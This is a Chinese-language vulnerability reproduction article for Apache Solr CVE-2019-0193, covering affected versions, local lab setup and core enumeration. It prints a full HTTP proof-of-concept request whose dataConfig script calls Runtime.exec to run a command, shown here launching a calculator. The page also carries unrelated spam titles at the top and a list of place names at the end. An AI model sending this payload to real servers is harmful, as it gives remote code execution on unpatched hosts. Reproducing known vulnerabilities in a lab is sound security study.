中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析

發布時間:2021-12-10 15:38:06 來源:億速云 閱讀:243 作者:柒染 欄目:大數據

今天就跟大家聊聊有關Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

0x01 影響范圍


Apache Solr < 8.2.0

0x02 環境搭建


下載地址:

https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

在本地解壓,進入solr-7.7.2目錄,執行命令

bin/solr -e dih (前提:java環境)

Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析

然后訪問http://localhost:8983/solr即可訪問環境

0x03 漏洞利用


首先我們可以通過接口

curl http://127.0.0.1:8983/solr/admin/cores

來獲取所有 core 信息,下面我們構造 payload 需要 name 信息

Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析

在Burp中發送以下POC即可執行命令彈出計算器,下面的<your_core_name> 需要替換為你獲取到的 core 的 name(共兩處)

POST /solr/<your_core_name>/dataimport HTTP/1.1Host: 127.0.0.1:8983Content-Length: 763User-Agent: Mozilla/5.0Content-type: application/x-www-form-urlencodedConnection: close
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(row){var process= java.lang.Runtime.getRuntime();process.exec("calc");return row;}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document></dataConfig>
執行效果如下:

Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析

看完上述內容,你們對Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

句容市| 厦门市| 呼伦贝尔市| 临颍县| 茂名市| 万安县| 和田市| 罗定市| 龙井市| 石泉县| 霍林郭勒市| 南华县| 班玛县| 新晃| 泰来县| 叙永县| 芮城县| 广丰县| 淮阳县| 洪江市| 六盘水市| 托克逊县| 洛隆县| 梁平县| 元谋县| 建始县| 新龙县| 冷水江市| 揭西县| 新安县| 大足县| 罗田县| 安吉县| 新源县| 安乡县| 卢氏县| 五家渠市| 岳阳县| 青海省| 万安县| 罗山县|